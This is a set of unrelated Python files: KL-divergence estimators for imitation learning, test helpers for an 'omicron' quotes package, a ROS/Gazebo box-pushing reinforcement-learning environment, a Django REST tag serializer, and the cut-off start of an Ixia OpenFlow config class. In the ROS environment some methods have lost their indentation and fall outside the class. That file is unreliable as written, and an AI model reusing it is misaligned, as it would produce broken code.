# E_q [log q/p] = E_q [(r - 1) - log r], r = p/q
def reverse_kl_density_based(agent_states, rho_expert, agent_density):
    """Schulman's low-variance KL estimator on agent samples.

    Uses f(r) = (r - 1) - log r with r = p/q, where p is the (clipped)
    expert density and q = exp(agent_density.score_samples(.)); the
    estimator is nonnegative and unbiased (see link in comment above).
    """
    expert_p = np.clip(rho_expert(agent_states), a_min=1e-8, a_max=None)
    agent_q = np.exp(agent_density.score_samples(agent_states))
    ratio = expert_p / agent_q
    return np.mean(ratio - 1 - np.log(ratio))
# E_p [log p/q] = E_p [(r - 1) - log r], r = q/p
def forward_kl_density_based(expert_states, rho_expert, agent_density):
    """Schulman's low-variance KL estimator on expert samples.

    Uses f(r) = (r - 1) - log r with r = q/p, where q is the (clipped)
    agent density exp(score_samples) and p the expert density.
    """
    agent_q = np.clip(np.exp(agent_density.score_samples(expert_states)), a_min=1e-8, a_max=None)
    ratio = agent_q / rho_expert(expert_states)
    return np.mean(ratio - 1 - np.log(ratio))
# NOTE: the above KL estimator is inaccurate especially for disjoint distributions. But they are smooth to plot and compare.
# If we want accurate estimator, please use it_estimator.kldiv() as below
def reverse_kl_knn_based(expert_states, agent_states):
    """Reverse KL estimated from samples via k-NN (wraps utils.it_estimator.kldiv;
    agent samples are passed first — see that module for the argument convention)."""
    return kldiv(agent_states, expert_states)
def forward_kl_knn_based(expert_states, agent_states):
    """Forward KL estimated from samples via k-NN (wraps utils.it_estimator.kldiv;
    expert samples are passed first — see that module for the argument convention)."""
    return kldiv(expert_states, agent_states)
def entropy(agent_states):
    """Sample-based entropy estimate of the agent state distribution
    (wraps utils.it_estimator.entropy)."""
    return it_entropy(agent_states)
def expert_samples(env_name, task, rho_expert, range_lim):
    """Collect at least task['expert_samples_n'] expert samples.

    Repeatedly runs rejection_sampling (which may return fewer than n
    accepted points per call) and concatenates the batches until the
    target count is reached.  Note the result may exceed n slightly.
    """
    target = task['expert_samples_n']
    batches = []
    total = 0
    trials = 0
    while total < target:
        batch = rejection_sampling(env_name, task, rho_expert, range_lim, target)
        batches.append(batch)
        total += batch.shape[0]
        print(f"trial {trials} samples {total}")
        trials += 1
    return np.concatenate(batches, axis=0)
# for KL evaluation
def rejection_sampling(env_name, task, rho_expert, range_lim, n=1000):
    """Draw up to n samples from rho_expert by rejection sampling (for KL eval).

    The proposal Q is uniform over the rectangle given by range_lim, and the
    envelope constant k = 2 bounds max(P(x) / Q(x)).  Only 'uniform'-style
    tasks are supported.  Returns the accepted subset, shape (m, 2), m <= n.
    """
    assert 'uniform' in task['task_name']
    envelope_k = 2  # k >= max(P(x) / Q(x)); 4.0/math.pi would also work
    (x_lo, x_hi), (y_lo, y_hi) = range_lim
    proposal_density = 1.0 / ((x_hi - x_lo) * (y_hi - y_lo))
    candidates = np.random.uniform((x_lo, y_lo), (x_hi, y_hi), size=(n, 2))
    u = np.random.uniform(0, 1, size=(n))
    # accept iff u <= P(x) / (k * Q(x))
    keep = u <= rho_expert(candidates) / (envelope_k * proposal_density)
    return candidates[keep]
def get_range_lim(env_name, task, env):
    """Return the 2-D support of the environment as [range_x, range_y].

    Args:
        env_name: registered gym env id.
        task: task config (unused; kept for signature compatibility).
        env: environment instance exposing range_x/range_y or range_lim.

    Raises:
        NotImplementedError: for environments whose support is unknown.
            (Previously an unknown env_name crashed with a confusing
            UnboundLocalError on range_x.)
    """
    # TODO: change to low, high
    if env_name in ["ContinuousVecGridEnv-v0", "ReacherDraw-v0"]:
        return [env.range_x, env.range_y]
    if env_name == "PointMazeRight-v0":
        return env.range_lim
    raise NotImplementedError(f"unknown environment: {env_name}")
def gaussian_samples(env_name, task, env, range_lim):
    """Draw expert samples from a Gaussian (or mixture-of-Gaussians) task.

    Draws task['expert_samples_n'] points and discards those outside the
    environment support (truncation does not change the KL ordering).

    Args:
        env_name: gym env id; determines the support test.
        task: dict with 'task_name' ('gaussian' / 'mix_gaussian'), 'goal',
            'goal_radius' and 'expert_samples_n'.
        env: environment (only env.radius is read, for ReacherDraw).
        range_lim: [range_x, range_y] rectangle bounds.

    Raises:
        NotImplementedError: unsupported env_name or task_name.
            (Previously an unsupported task_name left `samples` unbound and
            crashed later with UnboundLocalError.)
    """
    range_x, range_y = range_lim
    n = task['expert_samples_n']
    if env_name in ['ContinuousVecGridEnv-v0', "ReacherDraw-v0"]:
        if task['task_name'] == 'gaussian':
            # goal_radius may be a scalar std or a per-dimension array
            if isinstance(task['goal_radius'], float):
                r = task['goal_radius']
            else:
                r = np.array(task['goal_radius'])
            samples = multivariate_normal.rvs(mean=task['goal'], cov=r**2, size=n)
        elif task['task_name'] == 'mix_gaussian':
            m = len(task['goal'])
            z = np.random.choice(m, size=n)  # mixture component per sample, equal prob
            samples = []
            for g, r in zip(task['goal'], task['goal_radius']):
                samples.append(multivariate_normal.rvs(mean=g, cov=r**2, size=n))
            samples = np.array(samples)  # (m, n, 2)
            samples = np.take_along_axis(samples, z[None, :, None], axis=0)[0]  # like torch.gather, (n, 2)
        else:
            raise NotImplementedError(f"unsupported task: {task['task_name']}")
    # Keep only samples inside the environment support.
    if env_name == "ReacherDraw-v0":
        accepts = (samples[:, 0] ** 2 + samples[:, 1] ** 2) <= env.radius ** 2
    elif env_name in ["ContinuousVecGridEnv-v0"]:
        x_bool = np.logical_and(samples[:, 0] <= range_x[1], samples[:, 0] >= range_x[0])
        y_bool = np.logical_and(samples[:, 1] <= range_y[1], samples[:, 1] >= range_y[0])
        accepts = np.logical_and(x_bool, y_bool)
    else:
        raise NotImplementedError
    print(f"accepts {accepts.sum()}")
    return samples[accepts]  # discarding samples outside support does not change KL ordering
|
"""Unit test package for omicron."""
import asyncio
import json
import logging
import os
import socket
import subprocess
import sys
from contextlib import closing
import aiohttp
import aioredis
import cfg4py
import pandas as pd
cfg = cfg4py.get_instance()
logger = logging.getLogger(__name__)
def find_free_port():
    """Ask the OS for a currently-unused localhost TCP port.

    Binds a throwaway socket to port 0 (the kernel picks a free port),
    reads the assigned port back, and closes the socket.  The port is
    only *likely* still free when the caller later binds it.
    """
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
        sock.bind(("localhost", 0))
        return sock.getsockname()[1]
async def clear_cache(dsn):
    """Flush ALL keys from the redis instance at *dsn* (test-teardown helper)."""
    redis = await aioredis.create_redis(dsn)
    await redis.flushall()
def init_test_env():
    """Prepare the process for unit tests.

    Selects the DEV cfg4py profile, attaches a console log handler to the
    root logger, and initialises cfg4py from the omicron config directory.

    Returns:
        The initialised cfg4py configuration object.
    """
    os.environ[cfg4py.envar] = "DEV"
    src_dir = os.path.dirname(__file__)
    config_path = os.path.join(src_dir, "../omicron/config")
    handler = logging.StreamHandler()
    fmt = "%(asctime)s %(levelname)-1.1s %(name)s:%(funcName)s:%(lineno)s | %(message)s"
    formatter = logging.Formatter(fmt=fmt)
    handler.setFormatter(formatter)
    # NOTE(review): each call adds another StreamHandler to the root logger,
    # so calling this twice duplicates every log line — confirm single use.
    logger = logging.getLogger()
    logger.addHandler(handler)
    return cfg4py.init(config_path, False)
async def is_local_omega_alive(port: int = 3181):
    """Probe the local omega server's /sys/version endpoint.

    Returns:
        The version text when the server answers HTTP 200; ``True`` for any
        other HTTP status (the server responded, so it is up); ``False``
        when the request raised (e.g. connection refused / not started).
    """
    try:
        url = f"http://localhost:{port}/sys/version"
        async with aiohttp.ClientSession() as client:
            async with client.get(url) as resp:
                if resp.status == 200:
                    return await resp.text()
            return True
    except Exception:
        return False
async def start_omega(timeout=60):
    """Launch an omega quotes-server subprocess for tests and wait until it serves.

    Picks a free port, points ``cfg.omega.urls.quotes_server`` at it, then
    starts ``omega.app`` with the jqadaptor implementation.  JQ credentials
    come from the ``JQ_ACCOUNT`` / ``JQ_PASSWORD`` environment variables.

    Args:
        timeout: seconds to wait (polling once per second) for the server
            to become reachable.

    Returns:
        The ``subprocess.Popen`` handle of the running server.

    Raises:
        subprocess.SubprocessError: if the process exits early, or never
            becomes reachable within ``timeout`` seconds.
    """
    port = find_free_port()
    cfg.omega.urls.quotes_server = f"http://localhost:{port}"
    account = os.environ["JQ_ACCOUNT"]
    password = os.environ["JQ_PASSWORD"]
    # hack: by default postgres is disabled, but we need it enabled for ut
    cfg_ = json.dumps({"postgres": {"dsn": cfg.postgres.dsn, "enabled": "true"}})
    process = subprocess.Popen(
        [
            sys.executable,
            "-m",
            "omega.app",
            "start",
            "--impl=jqadaptor",
            f"--cfg={cfg_}",
            f"--account={account}",
            f"--password={password}",
            f"--port={port}",
        ],
        env=os.environ,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
    # Poll once per second: fail fast if the process died, return as soon
    # as the HTTP endpoint answers.
    for i in range(timeout, 0, -1):
        await asyncio.sleep(1)
        if process.poll() is not None:
            # already exit
            out, err = process.communicate()
            logger.warning(
                "subprocess exited, %s: %s", process.pid, out.decode("utf-8")
            )
            raise subprocess.SubprocessError(err.decode("utf-8"))
        if await is_local_omega_alive(port):
            logger.info("omega server is listen on %s", cfg.omega.urls.quotes_server)
            return process
    raise subprocess.SubprocessError("Omega server malfunction.")
def load_data(sec: str, frame_type: str, ext: str = "csv", sep="\t"):
    """Load a bars fixture named ``<sec>.<frame_type>.<ext>`` located next to
    this module, parsing the ``frame`` column as datetimes.

    Returns:
        A pandas DataFrame with ``frame`` converted via ``pd.to_datetime``.
    """
    path = os.path.join(os.path.dirname(__file__), f"{sec}.{frame_type}.{ext}")
    bars = pd.read_csv(path, sep=sep)
    bars["frame"] = pd.to_datetime(bars["frame"])
    return bars
|
#!/usr/bin/env python3
import gym
import json
import rospy
import rospkg
import numpy as np
from gym import utils, spaces
from gym.utils import seeding
from std_srvs.srv import Empty
from nav_msgs.msg import Odometry
from sensor_msgs.msg import LaserScan
from gazebo_msgs.srv import SetModelState
from gazebo_msgs.msg import ModelStates, ModelState
from observer import Observer
from navigator import Navigator
from envs.mainEnv import MainEnv
class DeepPusherEnv(MainEnv):
    def __init__(self):
        """Initialise the pusher environment: launch the Gazebo world, load all
        config files, and set up observation/navigation helpers, the discrete
        action space and reward bookkeeping."""
        # Get ros package path
        ros_ = rospkg.RosPack()
        ros_path = ros_.get_path('deep-rl-pusher')
        MainEnv.__init__(self, ros_path, "deepPusher-v0.launch")
        # Gazebo simulation control services.
        self.unpause = rospy.ServiceProxy('/gazebo/unpause_physics', Empty)
        self.pause = rospy.ServiceProxy('/gazebo/pause_physics', Empty)
        self.reset_proxy = rospy.ServiceProxy('/gazebo/reset_simulation', Empty)
        # Load configs
        sim_cfg = self.load_config(ros_path + "/config/sim.config")
        self.sim = sim_cfg['sim']['world']
        self.obs = sim_cfg['obs']
        self.lidar = self.load_config(ros_path + "/config/lidar.config")['lidar']
        #self.action_cfg = self.load_config(ros_path + "/config/actions.config")['action_space']
        self.action_cfg = self.load_config(ros_path + "/config/actions_mixed.config")['action_space']
        self.actions = self.action_cfg['actions']
        self.parameters = self.action_cfg['parameters']
        # Reward/penalty configuration: observation indices plus scaling.
        rewards_cfg = self.load_config(ros_path + "/config/rewards.config")['rewards']
        self.obs_idx_r, self.obs_idx_p, self.rewards, self.penalties, self.r_scale_factor = rewards_cfg['obs_index_r'], rewards_cfg['obs_index_p'], \
                                                                                            rewards_cfg['rewards'], rewards_cfg['penalties'], rewards_cfg['scale_factor']
        # Class that handles robot observations
        self.observer = Observer()
        self.observer.observe()
        # Class that handles all navigation
        self.navigator = Navigator()
        # Actions are loaded from config
        self.action_space = spaces.Discrete(len(self.actions))
        # Parametrise the steps of the simulation so that we can penalise long solutions
        self.steps = 0
        self.max_steps = sim_cfg['sim']['max_steps']
        self._seed()
        # Calculate initial distances
        self.last_cyl_dist = self.dist_init(cyl=True)
        self.last_goal_dist = self.dist_init(cyl=False)
        # Reward clip parameter for sanity
        self.reward_clip = rewards_cfg['reward_clip']
        # Terminate early if the robot is stuck
        self.robot_stuck = 0
        self.previous_robot_pose = [0, 0, 0]
def load_config(self, config):
data = None
with open(config) as file:
data = json.load(file)
return data
def dist_init(self, cyl=True):
''' Calculates initial distances for the reward initialisation '''
pose_cyl = [self.sim['target_cyl']['pos']['x'], self.sim['target_cyl']['pos']['y'], self.sim['target_cyl']['pos']['z']]
if cyl:
pose_robot = [self.sim['robot']['pos']['x'], self.sim['robot']['pos']['y'], self.sim['robot']['pos']['z']]
return self.dist_xy(pose_robot, pose_cyl)
else:
pose_goal = [self.sim['goal']['pos']['x'], self.sim['goal']['pos']['y'], self.sim['goal']['pos']['z']]
return self.dist_xy(pose_cyl, pose_goal)
def spawn_random(self, cyl=True, goal=False):
    """Teleport the target cylinder and/or the goal marker to a random
    arena position via the Gazebo /gazebo/set_model_state service.

    cyl  -- respawn the target cylinder (sampled in the near half: x up to l/2).
    goal -- respawn the goal marker (sampled past the arena midline).
    Side effect: the sampled positions are written back into self.sim.
    """
    if cyl:
        cyl_state = ModelState()
        cyl_state.model_name = self.sim['target_cyl']['id']
        # Sample keeping the whole cylinder (radius r) inside the arena bounds.
        r = float(self.sim['target_cyl']['radius'])
        w = float(self.sim['width'])
        l = float(self.sim['length'])
        new_x = np.random.uniform(r + 0.2, l / 2 - r + 0.1)
        new_y = np.random.uniform(r + 0.1, w - r + 0.1)
        cyl_state.pose.position.x = new_x
        cyl_state.pose.position.y = new_y
        # Must update config dict
        self.sim['target_cyl']['pos']['x'] = new_x
        self.sim['target_cyl']['pos']['y'] = new_y
        print('[ LOG] ..... Update dict target cyl>', new_x, new_y)
        # Use Gazebo service in order to change new cylinder pose
        rospy.wait_for_service('/gazebo/set_model_state')
        try:
            set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
            resp = set_state(cyl_state)
            print('[ LOG] ------------', resp)
        except (rospy.ServiceException) as e:
            print("Service call failed: %s" % e)
    if goal:
        goal_state = ModelState()
        goal_state.model_name = self.sim['goal']['id']
        r = float(self.sim['goal']['radius'])
        w = float(self.sim['width'])
        l = float(self.sim['length'])
        # Goal is placed beyond the arena midline (offset past l/2).
        offset = l / 2 + r + 0.1
        new_x = np.random.uniform(offset, l - r + 0.1)
        new_y = np.random.uniform(r + 0.1, w - r + 0.1)
        goal_state.pose.position.x = new_x
        goal_state.pose.position.y = new_y
        # Must update config dict
        self.sim['goal']['pos']['x'] = new_x
        self.sim['goal']['pos']['y'] = new_y
        print('[ LOG] ..... Update dict goal>', new_x, new_y)
        # Use Gazebo service in order to change new cylinder pose
        rospy.wait_for_service('/gazebo/set_model_state')
        try:
            set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
            resp = set_state(goal_state)
            print('[ LOG] ------------', resp)
        except (rospy.ServiceException) as e:
            print("Service call failed: %s" % e)
def at_goal(self, state):
    """Return True when the target cylinder sits inside the goal area."""
    _, p_target_cyl, p_goal, _, _ = state
    # Centre-to-centre distance minus the cylinder radius must be within
    # the goal radius plus a small tolerance.
    separation = self.dist_xy(p_target_cyl, p_goal) - self.sim['target_cyl']['radius']
    if separation <= self.sim['goal']['radius'] + 0.02:
        return True
    return False
def dist_goal(self, state):
    """Distance from the robot to the goal position."""
    p_goal = state[2]
    p_robot = state[3]
    return self.dist_xy(p_robot, p_goal)
def dist_cyl(self, state):
    """Distance from the robot to the target cylinder."""
    p_target_cyl = state[1]
    p_robot = state[3]
    return self.dist_xy(p_robot, p_target_cyl)
def dist_cyl_goal(self, state):
    """Distance from the target cylinder to the goal."""
    p_target_cyl = state[1]
    p_goal = state[2]
    return self.dist_xy(p_target_cyl, p_goal)
def dist_xy(self, pose1, pose2):
    """Euclidean distance between two poses projected onto the XY plane.

    3-element poses have their z component dropped; 2-element poses are
    used as-is.
    """
    a = np.asarray(pose1)
    b = np.asarray(pose2)
    if a.shape == (3,) and b.shape == (3,):
        a, b = a[:2], b[:2]
    delta = a - b
    return np.sqrt((delta * delta).sum())
def pose_to_array(self, pose):
    """Extract the [x, y, z] position of a ROS pose message as an ndarray."""
    p = pose.position
    return np.asarray([p.x, p.y, p.z])
def quat_to_array(self, pose):
    """Extract the orientation quaternion [w, x, y, z] of a ROS pose message."""
    q = pose.orientation
    return np.asarray([q.w, q.x, q.y, q.z])
def ori_align(self, state):
    """Collinearity measure of robot, target cylinder and goal positions.

    Computes |(y1 - y2) * (x1 - x3) - (y1 - y3) * (x1 - x2)| for
    robot (1), cylinder (2) and goal (3); it is 0 exactly when the three
    points are collinear, i.e. the robot is aligned to push the cylinder
    straight towards the goal, and grows with misalignment.

    Fix: removed the unused `import math` and `import transforms3d`
    statements that ran on every call (transforms3d was a hard third-party
    dependency that was never used).
    """
    _, pos_c, pos_g, pos_r, _ = state
    ori_diff = ((pos_r[1] - pos_c[1]) * (pos_r[0] - pos_g[0])
                - (pos_r[1] - pos_g[1]) * (pos_r[0] - pos_c[0]))
    return abs(ori_diff)
def transform_coordinates(self, length, height, x_coord, y_coord):
    """Map world (x, y) metre coordinates onto integer pixel coordinates
    of a length x height image covering the sim arena."""
    import math
    # Pixels that represent one metre along each axis.
    px_per_m_x = int(length / self.sim['length'])
    px_per_m_y = int(height / self.sim['width'])
    frac_x, whole_x = math.modf(x_coord)
    frac_y, whole_y = math.modf(y_coord)
    x_img = int(whole_x) * px_per_m_x + int(frac_x * px_per_m_x)
    y_img = int(whole_y) * px_per_m_y + int(frac_y * px_per_m_y)
    return x_img, y_img
def fill_obs(self, image, x, y, radius):
    """Paint a filled square of side 2*radius+1, centred at pixel (x, y),
    into `image` (clipped at the image borders) and return the image."""
    radius = int(radius)
    rows = image.shape[0]
    cols = image.shape[1]
    # A bound is used verbatim when it lies within [0, size]; otherwise it
    # falls back to the corresponding image edge.
    lo_x = x - radius if 0 <= x - radius <= rows else 0
    hi_x = x + radius + 1 if 0 <= x + radius + 1 <= rows else rows
    lo_y = y - radius if 0 <= y - radius <= cols else 0
    hi_y = y + radius + 1 if 0 <= y + radius + 1 <= cols else cols
    image[int(lo_x):int(hi_x), int(lo_y):int(hi_y)] = 1.0
    return image
def generate_obs_img(self, pos_c, pos_g, pos_r):
    """Render cylinder, goal and robot positions into a binary top-down
    image of the arena, flipped on both axes to match world orientation."""
    precision = self.obs['precision']
    # Arena size in pixels at the configured precision (metres per pixel).
    length = round(self.sim['length'] / precision)
    height = round(self.sim['width'] / precision)
    image = np.zeros((length, height), dtype=np.float16)
    # Stamp each entity in order: cylinder, goal, robot.
    entities = ((pos_c, self.sim['target_cyl']['radius']),
                (pos_g, self.sim['goal']['radius']),
                (pos_r, self.sim['robot']['radius']))
    for pos, radius in entities:
        px, py = self.transform_coordinates(length, height, pos[0], pos[1])
        image = self.fill_obs(image, px, py, radius / precision)
    # rotate over y and over x - np.flip(np.flip(a, 0), 1)
    return np.flip(np.flip(image, 0), 1)
def check_pose_stuck(self, obs_pose):
if round(obs_pose[0], self.obs['places']) == round(self.previous_robot_pose[0], self.obs['places']) \
and round(obs_pose[1], self.obs['places']) == round(self.previous_robot_pose[1], self.obs['places']):
return True
return False
def discretise_observation(self, state):
    """Turn a raw observation tuple into (image, printable string) form.

    The string is the image rendered with two-decimal floats, usable as a
    hashable/loggable state key.
    """
    _, pose_cyl, pose_goal, pose_robot, _ = state
    img = self.generate_obs_img(pose_cyl, pose_goal, pose_robot)
    as_str = np.array2string(img, formatter={'float_kind': lambda v: "%.2f" % v})
    return img, as_str
def observe_lidar(self, data, new_ranges):
    """Downsample a LaserScan to roughly `new_ranges` integer beams.

    Inf readings map to 6 (max bucket), NaN to 0, everything else is
    truncated to an int.

    Fix: the stride was computed with float division (a Python 2 port
    artefact); with a float modulus, `i % mod == 0` held for almost no
    index whenever len(ranges) was not an exact multiple of new_ranges,
    silently returning far fewer beams than requested. Integer division
    (floored, with a minimum stride of 1) restores the intended sampling.
    """
    d_ranges = []
    stride = max(1, len(data.ranges) // new_ranges)
    for i, item in enumerate(data.ranges):
        if i % stride == 0:
            if item == float('Inf') or np.isinf(item):
                d_ranges.append(6)
            elif np.isnan(item):
                d_ranges.append(0)
            else:
                d_ranges.append(int(item))
    return d_ranges
def observe(self):
    """Collect one full observation: downsampled lidar plus the poses of
    the target cylinder, the goal and the robot.

    Returns a 5-tuple (pc, pose_target_cyl, pose_goal, pose_robot,
    ori_robot). Blocks on ROS topics until data arrives.
    """
    # Block until a lidar scan arrives; the bare except swallows the rospy
    # timeout and simply retries.
    data = None
    while data is None:
        try:
            data = rospy.wait_for_message('/scan', LaserScan, timeout=5)
        except:
            pass
    # Downsample the scan into 6 integer range buckets.
    pc = self.observe_lidar(data, 6)
    ''' Model states can only be observed if we specify it in configuration '''
    if self.obs['target_cyl'] and self.obs['goal']:
        ''' Try to obtain model states from Gazebo '''
        obs = None
        # Retry until the robot model is registered in the Gazebo state list.
        while obs is None or self.sim['robot']['id'] not in obs.name:
            try:
                obs = rospy.wait_for_message('/gazebo/model_states', ModelStates, timeout=1)
                rospy.sleep(0.8)
            except:
                pass
        idx_target_cyl = obs.name.index(self.sim['target_cyl']['id'])
        pose_target_cyl = self.pose_to_array(obs.pose[idx_target_cyl])
        idx_goal = obs.name.index(self.sim['goal']['id'])
        pose_goal = self.pose_to_array(obs.pose[idx_goal])
        # Update config dicts
        self.sim['target_cyl']['pos']['x'] = pose_target_cyl[0]
        self.sim['target_cyl']['pos']['y'] = pose_target_cyl[1]
        self.sim['target_cyl']['pos']['z'] = pose_target_cyl[2]
        self.sim['goal']['pos']['x'] = pose_goal[0]
        self.sim['goal']['pos']['y'] = pose_goal[1]
        self.sim['goal']['pos']['z'] = pose_goal[2]
        if self.obs['robot']:
            idx_robot = obs.name.index(self.sim['robot']['id'])
            pose_robot = self.pose_to_array(obs.pose[idx_robot])
            ori_robot = self.quat_to_array(obs.pose[idx_robot])
            return (pc, pose_target_cyl, pose_goal, pose_robot, ori_robot)
        else:
            #TODO
            print('Not supported yet.')
    ''' Robot odometry estimated utilised in case we do not have access to the true pose '''
    # NOTE(review): if obs['target_cyl']/obs['goal'] are False,
    # pose_target_cyl and pose_goal are never bound and the return below
    # would raise UnboundLocalError -- confirm the config always enables
    # them together with the odometry path.
    if not self.obs['robot']:
        ''' Try to obtain odometry info from robot '''
        odom = None
        while odom is None:
            try:
                odom = rospy.wait_for_message('/odom', Odometry, timeout=5)
            except:
                pass
        pose_robot = self.pose_to_array(odom.pose.pose)
        ori_robot = self.quat_to_array(odom.pose.pose)
        return (pc, pose_target_cyl, pose_goal, pose_robot, ori_robot)
def reward(self, state):
    """Shaped reward: approach-the-cylinder plus push-cylinder-to-goal
    terms, minus a constant per-step penalty, clipped for sanity."""
    total = 0.0
    # Target cylinder distance to goal.
    cyl_to_goal = self.dist_cyl_goal(state)
    # Robot-to-cylinder distance: ground truth when available, otherwise
    # the robot's own belief from the observer.
    if self.obs['target_cyl']:
        robot_to_cyl = self.dist_cyl(state)
    else:
        robot_to_cyl = self.observer.cyl.dist_to()
    # Reward approaching the cylinder only when we actually got closer.
    if self.last_cyl_dist > robot_to_cyl:
        total += (self.last_cyl_dist - robot_to_cyl) * self.rewards[self.obs_idx_r['robot_cyl']]
    self.last_cyl_dist = robot_to_cyl
    # Signed reward for moving the cylinder towards the goal.
    total += (self.last_goal_dist - cyl_to_goal) * self.rewards[self.obs_idx_r['cyl_goal']]
    self.last_goal_dist = cyl_to_goal
    # Constant per-step penalty to discourage long solutions.
    total -= self.penalties[self.obs_idx_p['step']]
    # Clip for sanity.
    if not (-self.reward_clip < total < self.reward_clip):
        total = np.clip(total, -self.reward_clip, self.reward_clip)
        print('[ EXCEPTION] Warning: reward was outside of range!')
    return total
def _seed(self, seed=None):
    """Seed the environment RNG (gym convention) and return [seed]."""
    self.np_random, seed = seeding.np_random(seed)
    return [seed]
def step(self, action):
    """Apply one discrete action, observe, and return
    (state, reward, done, info).

    Fix: the robot-stuck penalty is now applied BEFORE the stuck counter
    is reset. The original zeroed `self.robot_stuck` first and then
    computed `penalty * self.robot_stuck`, which always multiplied by
    zero, so the penalty was never actually applied.
    """
    # Physics must be running for both the action and the observation.
    rospy.wait_for_service('/gazebo/unpause_physics')
    try:
        self.unpause()
    except (rospy.ServiceException) as e:
        print("[LOG] /gazebo/unpause_physics service call failed")
    # Dispatch the discrete action. Small action spaces use a single
    # left/right step size; larger ones offer two graded step sizes.
    if len(self.actions) <= 3:
        if action == self.actions['move_forward']:
            self.navigator.move_forward(0.35)
        elif action == self.actions['move_left']:
            self.navigator.move_left(0.15)
        elif action == self.actions['move_right']:
            self.navigator.move_right(0.15)
    else:
        if action == self.actions['move_forward']:
            self.navigator.move_forward(0.35)
        elif action == self.actions['move_left_1']:
            self.navigator.move_left(0.10)
        elif action == self.actions['move_left_2']:
            self.navigator.move_left(0.20)
        elif action == self.actions['move_right_1']:
            self.navigator.move_right(0.10)
        elif action == self.actions['move_right_2']:
            self.navigator.move_right(0.20)
    # Observe before pausing since our observations depend on Gazebo clock being published
    data = self.observe()
    state_img, state = self.discretise_observation(data)
    # Debug visualisation of the discretised state image.
    from PIL import Image
    im = Image.fromarray((state_img * 255).astype(np.uint8))
    im.save("resources/state.png")
    # Track whether the robot pose changed since the previous step.
    if self.steps > 0:
        if self.check_pose_stuck(data[3]):
            self.robot_stuck += 1
        else:
            self.robot_stuck = 0
    self.previous_robot_pose = data[3]
    rospy.wait_for_service('/gazebo/pause_physics')
    try:
        self.pause()
    except (rospy.ServiceException) as e:
        print("[LOG] /gazebo/pause_physics service call failed")
    done = False
    reward = self.reward(data)
    if self.at_goal(data):
        reward += self.rewards[self.obs_idx_r['at_goal']]
        done = True
        print("[ENV] Target cylinder is at goal!")
    if self.robot_stuck > 6:
        done = True
        # Penalise proportionally to how long the robot has been stuck,
        # THEN reset the counter (the reset used to come first, zeroing
        # the penalty).
        reward -= self.penalties[self.obs_idx_p['robot_stuck']] * self.robot_stuck
        self.robot_stuck = 0
        print("[ENV] Robot has not altered its position for 6 consecutive time steps.")
    self.steps += 1
    if self.steps == self.max_steps:
        reward -= self.penalties[self.obs_idx_p['max_steps']]
        done = True
        print("[ENV] Steps taken are over the maximum allowed threshold.")
    return state, reward, done, self.observer.cyl.get_layout_dict()
def reset(self):
    """Reset the Gazebo simulation and return the initial discretised
    state string."""
    # Restart environment state and return initial observation
    rospy.wait_for_service('/gazebo/reset_simulation')
    try:
        self.reset_proxy()
    except(rospy.ServiceException) as e:
        print("[LOG] /gazebo/reset_simulation service call failed")
    # Unpause and observe
    rospy.wait_for_service('/gazebo/unpause_physics')
    try:
        self.unpause()
    except(rospy.ServiceException) as e:
        print("[LOG] /gazebo/unpause_physics service call failed")
    # Force new cylinder registration
    self.observer.observe(force_ob_cyl=True)
    # Observe before pausing since our observations depend on Gazebo clock being published
    data = self.observe()
    # NOTE(review): state_img is discarded; only the string state is returned.
    state_img, state = self.discretise_observation(data)
    rospy.wait_for_service('/gazebo/pause_physics')
    try:
        self.pause()
    except(rospy.ServiceException) as e:
        print("[LOG] /gazebo/pause_physics service call failed")
    return state
|
import logging
from rest_framework import serializers
from saas_framework.tags.models import Tag
from rest_framework.relations import PrimaryKeyRelatedField
from saas_framework.workspaces.models import Workspace
logger = logging.getLogger(__name__)
class TagSerializer(serializers.ModelSerializer):
    """DRF serializer for Tag instances, exposing only `id` and `name`."""
    class Meta:
        model = Tag
        fields = ['id', 'name']
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
from typing import List, Any, Union
class SwitchGroupsList(Base):
    """Openflow Switch Groups level Configuration
    The SwitchGroupsList class encapsulates a list of switchGroupsList resources that are managed by the system.
    A list of resources can be retrieved from the server using the SwitchGroupsList.find() method.
    """
    __slots__ = ()
    _SDM_NAME = 'switchGroupsList'
    # Maps the Python-facing attribute names to the underlying SDM/REST
    # attribute names used on the wire.
    _SDM_ATT_MAP = {
        'Active': 'active',
        'ApplyGroup': 'applyGroup',
        'CopyTtlIn': 'copyTtlIn',
        'CopyTtlOut': 'copyTtlOut',
        'Count': 'count',
        'DecrementMplsTtl': 'decrementMplsTtl',
        'DecrementNetwork': 'decrementNetwork',
        'DescriptiveName': 'descriptiveName',
        'GroupType': 'groupType',
        'MaxNumberOfGroups': 'maxNumberOfGroups',
        'Name': 'name',
        'Output': 'output',
        'ParentSwitch': 'parentSwitch',
        'PopMpls': 'popMpls',
        'PopPbb': 'popPbb',
        'PopVlan': 'popVlan',
        'PushMpls': 'pushMpls',
        'PushPbb': 'pushPbb',
        'PushVlan': 'pushVlan',
        'SetField': 'setField',
        'SetMplsTtl': 'setMplsTtl',
        'SetNetwork': 'setNetwork',
        'SetQueue': 'setQueue',
    }
    # This resource has no enum-valued attributes.
    _SDM_ENUM_MAP = {
    }
    def __init__(self, parent, list_op=False):
        """Attach this resource under *parent*; list_op marks list-operation mode."""
